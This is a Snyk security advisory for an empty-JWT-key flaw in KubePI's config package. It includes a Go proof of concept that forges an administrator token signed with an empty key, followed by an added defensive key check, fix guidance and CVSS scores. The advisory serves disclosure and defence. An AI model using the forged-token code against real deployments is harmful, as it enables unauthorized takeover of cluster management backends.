Improper Validation of Integrity Check Value Affecting github.com/kubeoperator/kubepi/internal/config package, versions >=1.6.3 <1.8.0


Severity

medium

CVSS assessment made by Snyk's Security Team

Threat Intelligence
  • Exploit Maturity: Proof of concept
  • EPSS: 0.04% (11th percentile)

  • Snyk ID SNYK-GOLANG-GITHUBCOMKUBEOPERATORKUBEPIINTERNALCONFIG-7572606
  • published 29 Jul 2024
  • disclosed 25 Jul 2024
  • credit ibranch7

How to fix?

Upgrade github.com/KubeOperator/kubepi/internal/config to version 1.8.0 or higher.

Overview

Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value due to the JWT key handling during the configuration file reading process. An attacker can bypass login verification and directly take over the backend by exploiting the empty key used in JWT token generation.

PoC

package main

import (
    "fmt"
    "github.com/kataras/iris/v12/middleware/jwt"
    "log"
    "time"
)

var jwtMaxAge = 100000 * time.Minute

// UserProfile holds the claims the PoC places in the token.
type UserProfile struct {
    Name                string              `json:"name"`
    NickName            string              `json:"nickName"`
    Email               string              `json:"email"`
    Language            string              `json:"language"`
    ResourcePermissions map[string][]string `json:"resourcePermissions"`
    IsAdministrator     bool                `json:"isAdministrator"`
    Mfa                 Mfa                 `json:"mfa"`
}

type Mfa struct {
    Enable   bool   `json:"enable"`
    Secret   string `json:"secret"`
    Approved bool   `json:"approved"`
}

func main() {
    // The empty signing key is the weakness described above: HS256 with key ""
    // produces tokens the affected versions accept.
    jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
    test := map[string][]string{}
    profile := UserProfile{
        Name:                "admin",
        NickName:            "Administrator",
        Email:               "support@fit2cloud.com",
        Language:            "zh-CN",
        ResourcePermissions: test,
        IsAdministrator:     true,
        Mfa: Mfa{
            Secret:   "",
            Enable:   false,
            Approved: false,
        },
    }
    nonejwt, err := jwtSigner.Sign(profile)
    if err != nil {
        log.Fatal(err)
    }
    fmt.Println(string(nonejwt))
}
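The advisory's point is that an empty HMAC key turns signature verification into a no-op. The Go example below is added here and is not part of Snyk's advisory or the KubePI code base: it shows a startup check that refuses an empty or short key read from configuration, beside a minimal standard-library HS256 signer/verifier that demonstrates why a token minted with the empty key passes. `ValidateJWTKey`, `minJWTKeyBytes` and the helpers are hypothetical names, and the 32-byte minimum is an assumed policy value.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

const minJWTKeyBytes = 32 // assumed policy value, not taken from the advisory

// ValidateJWTKey is a hypothetical startup check: reject an empty or short HMAC key from config.
func ValidateJWTKey(key string) error {
	if key == "" {
		return fmt.Errorf("jwt key is empty: anyone can mint tokens the server accepts")
	}
	if len(key) < minJWTKeyBytes {
		return fmt.Errorf("jwt key too short: %d bytes, need %d", len(key), minJWTKeyBytes)
	}
	return nil
}

// hs256 returns the base64url HMAC-SHA256 tag over a JWT signing input.
func hs256(signingInput string, key []byte) string {
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(signingInput))
	return base64.RawURLEncoding.EncodeToString(mac.Sum(nil))
}

// SignHS256 builds a compact JWT from raw JSON claims (used here only to show what an empty key admits).
func SignHS256(claimsJSON string, key []byte) string {
	b64 := base64.RawURLEncoding.EncodeToString
	input := b64([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64([]byte(claimsJSON))
	return input + "." + hs256(input, key)
}

// VerifyHS256 checks a compact JWT's signature with a constant-time compare.
func VerifyHS256(token string, key []byte) bool {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return false
	}
	return hmac.Equal([]byte(parts[2]), []byte(hs256(parts[0]+"."+parts[1], key)))
}

func main() {
	forged := SignHS256(`{"name":"admin","isAdministrator":true}`, []byte(""))
	fmt.Println("empty-key server accepts forged token:", VerifyHS256(forged, []byte("")), "- startup check:", ValidateJWTKey(""))
}
```

The check belongs where the configuration file is read, so a deployment with a missing key fails to start instead of silently issuing forgeable sessions.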

CVSS Scores (version 4.0)

Snyk (recommended): 5.3 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    None
  • Privileges Required (PR)
    Low
  • User Interaction (UI)
    None
  • Confidentiality (VC)
    Low
  • Integrity (VI)
    Low
  • Availability (VA)
    Low
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None